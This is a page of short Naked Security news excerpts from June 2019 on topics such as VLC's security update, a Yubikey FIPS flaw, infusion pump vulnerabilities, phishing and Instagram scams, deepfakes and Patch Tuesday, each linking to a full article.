VLC media player gets biggest security update ever

By John E Dunn

Earlier this month, VideoLAN – the maintainers of the world’s most popular open source media player, VLC – issued the biggest single set of security fixes in the program’s history.

Numbering 33 in all, this included two marked critical, 21 mediums and 10 rated low, bringing VLC to 3.0.7.

But perhaps the most interesting part of the story is less the flaws themselves but the process through which they were found.

The most serious flaws

The first of the criticals, CVE-2019-12874, discovered and documented in detail by Symeon Paraschoudis of Pen Test Partners, is an out-of-bounds write flaw in the FAAD2 MPEG-4 and MPEG-2 AAC decoder library used by VLC 3.0.6 and earlier.

The second is CVE-2019-5439, a stack buffer overflow in version 4.0.0 beta’s Reliable Internet Stream Transport (RIST), potentially allowing remote code execution (RCE) at the user’s privilege level, if a the user can be persuaded to run a malicious AVI or MKV video file.

The mediums, meanwhile, are described by VideoLAN’s Jean-Baptiste Kempf as “mostly out-of-band reads, heap overflows, NULL-dereference and use-after-free security issues,” which could crash VLC.

Read more at https://nakedsecurity.sophos.com/2019/06/26/vlc-media-player-gets-biggest-security-update-ever/

Google creates educational tools to help kids spot fake news

By Danny Bradbury

Google is on a mission to teach kids how to spot fake news. The company has expanded its internet safety guide for children with techniques and games to help them be more information literate online.

The expansion is part of its Be Internet Awesome (Be Internet Legends in the UK) initiative, aimed at families, educators, and children to help young people be better online citizens and protect themselves.

The initiative, which aligns with educational standards from the International Society for Technology in Education (ISTE) and the American Association of School Librarians (AASL), features an ‘Internet Code of Awesome’ supported by lesson plans that include ‘Share with Care’, ‘Secure your Secrets’, ‘It’s Cool to be Kind’, and ‘When in Doubt, Talk It Out’.

Don’t Fall for Fake

The new activities are listed under another item in the Code: ‘Don’t Fall for Fake’. Google developed them in conjunction with Anne Collier, executive director of The Net Safety Collaborative, and Faith Rogow, PhD, co-author of The Teacher’s Guide to Media Literacy and a co-founder of the National Association for Media Literacy Education.

Read more at https://nakedsecurity.sophos.com/2019/06/26/google-launches-educational-tools-to-help-kids-spot-fake-news/

Serious Security: Rambleed attacks blunted – the OpenSSH way

By Paul Ducklin

We all know that you’re not supposed to save raw passwords to disk these days.

The reason is obvious: disk storage is generally supposed to be both permanent and shared.

Once you’ve written something to disk unencrypted, there’s always a chance that someone else might be able to get it back later, especially if they know it’s there and it’s worth looking for.

At worst, they could shut down the computer your program is running on, remove the disk (or desolder the chips that make up a solid-state storage device) and try to extract the data elsewhere at their leisure.

As we like to say at Naked Security, Dance like no one’s watching. Encrypt like everyone is.

Of course, blunders happen – even companies that pride themselves on being leaders in secure coding practices have recently admitted to saving plaintext passwords by mistake.

Facebook let plaintext passwords escape into logfiles for about seven years before noticing the error; rivals Google made a similar mistake in a sysadmin toolkit for an astonishing 14 years, admitting in May 2019 that “we made an error when implementing this functionality back in 2005.”

Read more at https://nakedsecurity.sophos.com/2019/06/25/serious-security-rambleed-attacks-blunted-the-openssh-way/

WeTransfer sends user file links to wrong people

By Danny Bradbury

Popular file transfer service WeTransfer faces embarrassment this week after admitting that it has mailed file links to the wrong users.

Founded in 2009, WeTransfer enables users to transfer large files between each other for free. It’s an alternative to email services, which typically place limitations on file size. It has 50 million users sending a billion files each month, amounting to a Petabyte (1,000 Terabytes) of data.

The service, which became profitable in 2013, provides its free version through an advertising model. It also offers a paid ‘Plus’ service that lets users password protect their files.

On 21 June 2019 WeTransfer posted a security notice warning of an incident it had discovered five days earlier on Monday 17 June 2019.

The issue began on 16 June 2019, the notice said, adding:

e-mails supporting our services were sent to unintended e-mail addresses. We are currently informing potentially affected users and have informed the relevant authorities.

WeTransfer had blocked the links and logged users out of their accounts, it said.

Read more at https://nakedsecurity.sophos.com/2019/06/25/wetransfer-sends-user-file-links-to-wrong-people/

Presidential text alerts are open to spoofing attacks, warn researchers

By John E Dunn

Researchers have shown that it’s technically possible for hackers to target the US presidential alerts system to send fake messages on a localized basis.

For anyone who can’t remember what these are, the Federal Emergency Management Agency (FEMA), which manages the system, sent a message to US 200 million mobile users designed to test the Wireless Emergency Alerts (WEA) system at 2:18 pm (ET) on 3 October 2018. It read:

Presidential Alert. THIS IS A TEST of the National Wireless Emergency Alert System. No action is needed.

Judging from Twitter responses and a legal challenge, not all Americans were pleased at the idea of being sent a text message of up to a 90-characters by the US President that they can’t opt out of or block, but it did achieve its purpose of publicizing an unfamiliar element of the system.

Launched in 2006, there are in fact three types of Integrated Public Alert and Warnings System (IPAWS) alerts, the other two being Imminent Threat Alerts (usually weather or fire-related) and Amber Alerts used to tell people about missing or abducted children.

Emergency alerts also have the potential to go badly wrong, as millions of Hawaii residents discovered on 13 January 2018, when they received the following terrifying message at 8:07 am:

Emergency alert. Ballistic missile inbound to Hawaii. Seek immediate shelter. This is not a drill.

As people crawled under café tables in fear, it took 38 minutes for the authorities to confirm that the message was a false alarm caused by human error.

Read more at https://nakedsecurity.sophos.com/2019/06/25/presidential-text-alerts-are-open-to-spoofing-attacks-warn-researchers/

June 18, 2019 »

90% off Ray-Bans? It’s a 100% Instagram SCAM!

By Lisa Vaas

A scam ad for Ray-Ban sunglasses has been making the rounds on Instagram.

There are many versions, but they tend to feature the Ray-Ban logo and photos of sunglasses, along with the “whoa, what a crazy deal!” offers of “90% off”. We’ve seen one that dangles the cheap-cheap price tag of £17.65 (that’s US $22.13 – for glasses that typically go for over $100).

And of course, you better hurry, since this offer won’t last – it’s one day only! … And has been for a few weeks!

Not everybody is going to see the fake ads and write them off as being the scams that they are, unfortunately. After all, the ads bear the name of a (self-proclaimed) “official” website. Plus, you’ve likely seen these ads being posted by your Instagram friends.

Don’t fall for it, though. It seems too good to be true, which means it is.

Read more at https://nakedsecurity.sophos.com/2019/06/18/90-off-ray-bans-its-a-100-instagram-scam/

Bella Thorne steals hacker’s thunder, publishes nude photos herself

By Lisa Vaas

The forces of extortionist scumbaggery have had the rug pulled out from them yet again: last week, it was Radiohead, releasing 18 hours of music rather than pay up to whoever hacked it away.

This week, it’s American actress Bella Thorne. Her approach: Oh, so you’re threatening to publish nude pics you hacked out of my accounts? Too late – I did it myself.

Thorne posted the images to Twitter on Saturday. She said in the tweet, which included screenshots of text messages with the alleged hacker, that “all of her s**t” got hacked on Friday. Then, she had to put up with 24 hours of threats “with my own nudes.”

I feel gross. I feel watched, I feel someone has taken something from me that I only wanted one special person to see.

Oh, and by the way, the FBI will be at your door shortly, she also said.

By Sunday, Thorne was still angry and hurt, but feeling a bit more compassionate toward whatever nimrod tried to blackmail her. In an interview with Hollywood Reporter, she said that she thinks whoever hacked her is a kid – somebody who made a bad choice and shouldn’t have his life ruined because of it:

This kid sounds like he’s 17, as much as I’m so angry and wanted to [f**k] him up over doing this to people I just wanted to teach him a lesson, He’s still a kid and we make mistakes, this mistake is a bad one. But I don’t want some 17-year-old’s whole life ruined because he wasn’t thinking straight and [was] being a dumbass.

“If she hadn’t taken them in the first place…”

Read more at https://nakedsecurity.sophos.com/2019/06/18/bella-thorne-steals-hackers-thunder-publishes-nude-photos-herself/

The US is reportedly seeding Russia’s power grid with malware

By Danny Bradbury

The US has been quietly planting malware throughout Russia’s energy networks in response to years of Russian attacks on its own power grid, the New York Times reported on Saturday.

Quoting officials interviewed over the last three months, the paper said that the latest moves represent a turning point for the US policy on interfering with Russia’s electricity infrastructure. Under the Obama administration, the US had used reconnaissance tools to monitor Russia’s electricity control systems. The Trump administration has escalated this activity to an offensive campaign, placing software that could destabilize electrical services within Russia.

The move follows years of provocation by Russia, which has reportedly run recurring cybercampaigns targeting the US energy grid.

In March 2019, the Department of Homeland Security (DHS) reported that Russian hackers had been targeting US infrastructure including not just energy and nuclear facilities, but also water, aviation, and critical manufacturing sectors. The hackers would infiltrate the targets’ trusted partner organizations and use them as staging grounds for their attacks, the report warned.

That report updated a similar warning in October 2017, although that one did not single Russia out for blame.

Most recently, security firm Dragos alleged that Xenotime, a hacking group thought to be linked to Moscow, has been using its Triton (also known as Trisys) malware to explore US power networks in possible preparation for a future attack. It identified…

… a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.

This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.

Read more at https://nakedsecurity.sophos.com/2019/06/18/the-us-is-reportedly-seeding-russias-power-grid-with-malware/

Phishing attack lures victims with encrypted message alert

By John E Dunn

What is it about phishing emails that makes them so enduringly popular with the bad guys?

The standard answer is they exploit fear, alarm and annoyance to persuade users to click on them, which explains the horde of campaigns using fictitious legal threats or warnings about bank accounts to get a foot in the door.

However, a new campaign covered by Bleeping Computer reminds us that there is another psychological impulse that works just as well if skillfully deployed – curiosity.

This one is couched as an email, apparently from Microsoft, alerting the recipient to an encrypted message which must be viewed by accessing OneDrive for Business.

It used to be said that the best phishing attacks gamed their victims in the shortest possible time and the fewest steps but that was before cloud services were invented where, arguably, introducing more steps now aids authenticity.

This one has several, including a faked-up OneDrive-branded email with a blue ‘Open’ button plastered in the middle of it, followed by – of course – a pretend OneDrive login page that asks users to enter their account credentials to download the file.

It’s like being asked to follow a trail of sweets to find out what’s at the end only to discover it’s a pit filled with spikes.

A big giveaway is that Microsoft business accounts should be protected by two-factor authentication (2FA), which this fake login lacks, but it’s possible some users won’t notice its absence if they’re not familiar with it.

Read more at https://nakedsecurity.sophos.com/2019/06/18/phishing-attack-lures-victims-with-encrypted-message-alert/

June 17, 2019 »

Yubico recalls FIPS Yubikey tokens after flaw found

By John E Dunn

Security token maker Yubico has issued an important advisory affecting high-end versions of its YubiKey authentication key, arguably the most significant vulnerability discovered in this class of product to date.

Yubico describes the bug in its FIPS series as being:

Where the first set of random values used by YubiKey FIPS applications after each device power-up have reduced randomness … for the first operations performed after YubiKey FIPS power-up. The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted.

In other words, for the first operation after power-up at least, the cryptographic material produced by the key isn’t as random as it should be for secure encryption, creating a hypothetical short-term weakness that is only ironed out when that data has been consumed.

This affects cryptographic algorithms to different extents. For RSA it’s a modest 80 bits out of a minimum of 2,048 while for ECDSA it’s more like 80 bits out of 256 which could:

Allow an attacker who gains access to several signatures to reconstruct the private key.

These differences mean that the weakness is worse in some products than in others, for example the PIV Smart Card and OpenPGP implementations (which use RSA) compared to the FIPS FIDO U2F keys (whose authentication depends on ECDSA).

FIPS with everything

The weakness exists only in the YubiKey FIPS, YubiKey Nano FIPS, YubiKey C FIPS, and YubiKey C Nano FIPS, that is products that have the ‘FIPS’ prefix printed on them. Consumer and most business YubiKeys are not affected.

Read more at https://nakedsecurity.sophos.com/2019/06/17/yubico-recalls-fips-yubikey-tokens-after-flaw-found/

Privacy foul for soccer league app that eavesdropped on users

By Danny Bradbury

A privacy violation case this month has illustrated the dangers of giving apps access to your smartphone sensors. Spain’s data protection agency is reportedly fining Spanish football league LaLiga €250,000 (around $280,000) for co-opting users’ smartphones as digital eavesdropping tools.

The organization’s app, available on both the iPhone and iOS platforms, provides users with soccer commentary, news, and data. Unbeknownst to those who didn’t read the fine print, it also used their GPS functions to determine where they were during football matches.

The app would then use their smartphones’ microphones to record ambient noise and see if it matched game noise. If the app found a match, and discovered that you were in a public place like a bar, it could deduce that the game was being broadcast illegally.

This approach is similar to the Shazam app’s technique of matching ambient noise with known songs to tell you what music your coffee shop is playing. The difference is that this is Shazam’s primary and publicized purpose. LaLiga’s app was doing its matching unobtrusively in the background while it provided users with another service.

Read more at https://nakedsecurity.sophos.com/2019/06/17/privacy-foul-for-soccer-league-app-that-eavesdropped-on-users/

I’d like to add you to my professional network of people to spy on

By Lisa Vaas

We’re sorry to inform you that if you were looking for some insight into Russian and Eurasian politics in the Washington political scene, or if you were sniffing around for a job with, say, the Brookings Institution, you won’t have 30-year-old Katie Jones to cozy up to anymore.

She’s disappeared off of LinkedIn. Actually, “she” – as in, a corporal being, as opposed to a deepfake created by artificial intelligence (AI) –  was never there to begin with, according to an investigation by the Associated Press.

This is what her LinkedIn profile looked like before Katie Jones, an extremely well-connected redhead and purportedly a Russia and Eurasia Fellow at the top think-tank Center for Strategic and International Studies (CSIS), blinked out of existence.

AP reporter Raphael Satter says that the profile was removed from LinkedIn about 36 hours after he contacted the networking platform about it.

Most people, upon seeing a connection request from such a highly placed and accomplished young woman, would likely accept. After all, there’s a strong element of self-promotion with LinkedIn networking, as pointed out by many of the 40 or so people whom the Jones profile managed to connect with and whom Satter interviewed.

Read more at https://nakedsecurity.sophos.com/2019/06/17/id-like-to-add-you-to-my-professional-network-of-people-to-spy-on/

Widely used medical infusion pump can be remotely hijacked

By Lisa Vaas

Researchers have found two security vulnerabilities, one severe, in Becton Dickson (BD) infusion pumps: the devices used in hospitals for supplying power and network connectivity to multiple infusion and syringe pumps that deliver fluids, including intravenous fluids, painkillers and medications such as insulin.

Such pumps are often hooked up to a central monitoring station so that hospital staff can check on multiple patients at the same time.

The flaws, in BD’s Alaris Gateway Workstation (AGW), were discovered by the healthcare cybersecurity firm CyberMDX in September 2018. The firm’s researchers said on Thursday that one of the security flaws – the most critical, according to an advisory issued by the Department of Homeland Security (DHS), also on Thursday – could allow the devices to be remotely hijacked and controlled.

The researchers said that the exploit could be carried out by…

… anyone who gains access to the hospital’s internal network. Files transferred via the update are copied straight to the internal memory and allowed to override existing files.

The vulnerable part of the pumps is the firmware in the onboard computer, which powers, monitors and controls the infusion pumps. The pumps run on Windows CE, which is Microsoft’s operating system for embedded devices and devices with minimal memory. That operating system later came to be known as Windows Embedded Compact.

Read more at https://nakedsecurity.sophos.com/2019/06/17/widely-used-medical-infusion-pump-can-be-remotely-hijacked/

Android phones can now be security keys for iOS devices

By Danny Bradbury

Hey, iOS users. Got a spare Android phone lying around? Now, you can use it as a secure access key for online services.

In April, Google announced that it was making secure access keys available on its Android phones. These software-based keys are based on the FIDO2 standard, which is a community attempt by several industry players to make secure logins easier.

Instead of having to remember a password when logging into a website, you can use a digital key stored on a piece of suitable hardware. Google and other vendors offer small hardware dongles that connect either via a computer’s USB port, or via Bluetooth. Your browser reads the digital key from the device and sends it to the website to prove that you’re legit.

Letting users store this digital key in their Android phones turns it into a secure access device that requires you to be in physical control of your phone to authenticate to a site on your computer. By using the Bluetooth connection in their phones, they can authenticate themselves when logging into Google services.

These phone-based keys also stop phishers from mounting man-in-the-middle attacks. The phone stores the key against the URL of the website it’s trying to access so it isn’t available to the wrong (phishy) URL.

Read more at https://nakedsecurity.sophos.com/2019/06/14/android-phones-can-now-be-security-keys-for-ios-devices/

Facebook got 187,000 users’ data with snoopy VPN app

By Lisa Vaas

In January, Apple’s App Store gave the heave-ho to Facebook’s snoopy Research VPN (virtual private network) app.

Now we know how many users Facebook Research got personal and sensitive device data from: 187,000, according to a letter sent by Facebook to Senator Richard Blumenthal and obtained by TechCrunch. That’s 31,000 US users – 4,300 of whom are teenagers – and with the rest being from India.

The now-defunct Research app used its access to get what security researcher Will Strafach called “nearly limitless access.” That includes web browsing histories, encrypted messages and mobile app activity of not just the volunteer users but also, potentially, data from their friends.

It was kicked from the App Store for violating Apple’s Developer Enterprise Program License Agreement by installing a root certificate. Something that’s supposed to be limited to “for use by your employees”.

Facebook pushed back at the negative coverage it received following the eviction, pointing out that it wasn’t the snoopiness of the app that saw it discarded, and that users were well aware they were being snooped on:

…there was nothing ‘secret’ about this; it was literally called the Facebook Research App. It wasn’t ‘spying’ as all of the people who signed up to participate went through a clear on-boarding process asking for their permission and were paid to participate.

The data was used for competitive analysis. Facebook used an earlier version of VPN app, Onavo, to track its competition and scope out new product categories. Private, internal emails from Facebook staff that were published in December 2018 revealed that Facebook had relied on the Onavo data when it decided to purchase WhatsApp, for example. The company also used the Onavo data to track usage of its rivals and to block some of them – including Vine, Ticketmaster, and Airbiquity – from accessing its friends data firehose API.

Read more at https://nakedsecurity.sophos.com/2019/06/14/facebook-got-187000-users-data-with-snoopy-vpn-app/

Facebook keeps deepfake of Mark Zuckerberg

By Lisa Vaas

After a fake video of House Speaker Nancy Pelosi depicting her drunkenly slurring her words went viral last month, Facebook said nope, we’re not taking it down.

We’ve flagged it as fake, Facebook said, we’ve de-prioritized it so doesn’t show up (all that much) in users’ feeds, and we slapped third-party fact-checker information next to it.

Facebook VP for Product Policy and Counterterrorism Monika Bickert, from a grilling by CNN’s Anderson Cooper:

We think it’s important for people to make their own, informed choice about what to believe. Our job is to make sure we are getting them accurate information. And that’s why we work with more than 50 fact-checking organizations around the world.

Oh, reeeeeally?

Well, Facebook’s bluff has been called. Facebook, meet your CEO’s evil deepfake twin, the Zucker-borg who implies that he’s in total control of billions of people’s stolen data and ready to control the future. To rub a bit of salt into the wound, it was distributed on Facebook’s own Instagram platform, and it was gussied up with official CBS trademarking so it looked like a bona fide interview.

Read more at https://nakedsecurity.sophos.com/2019/06/13/facebook-keeps-deepfake-of-mark-zuckerberg/

Critical Adobe Flash player bug and more in June’s Patch Tuesday

By Danny Bradbury

The June patch Tuesday is out, featuring 88 CVE-level fixes, including 21 rated critical. Adobe, meanwhile, fixes several critical vulnerabilities, including a flaw in Adobe Flash Player marked critical because it could be exploited remotely. 

Adobe published a patch for a Flash Player bug  (CVE-2019-7845), affecting versions 32.0.0.192 and earlier, that lets an attacker exploit the program through a malicious website or an ActiveX control. A successful attacker could run their own code remotely as the current user. The bug affects the Flash Player desktop runtime on Windows, macOS and Linux, along with the Google Chrome, Microsoft Edge, and IE 11 Flash Player plugins.

Also out from Adobe on Tuesday was a fix for critical vulnerabilities in its ColdFusion rapid web application development product. CVE-2019-7838 enables an attacker to bypass a file extension blacklist when uploading a file, while CVE-2019-7839 is an unspecified command injection vulnerability. The third, CVE-2019-7840, is a bug that allows for deserialization of untrusted data (deserialization means unpacking data from a format used to send it somewhere efficiently).

Finally, Adobe patched a critical vulnerability in its Campaign product for marketing professionals which could allow for remote code execution via a command injection flaw. It fixed this vulnerability (CVE-2019-7850) along with several other flaws rated either moderate or important.

Microsoft Edge

Microsoft’s other critical bug this month was in the scripting engine underpinning Microsoft Edge. This is the program that processes scripting languages like JavaScript. The engine doesn’t handle objects properly when running scripts in the Edge browser, meaning that a malicious website could cause it to spill its memory contents.

Read more at https://nakedsecurity.sophos.com/2019/06/12/june-patch-tuesday-sees-critical-adobe-flash-player-bug-fix/

« older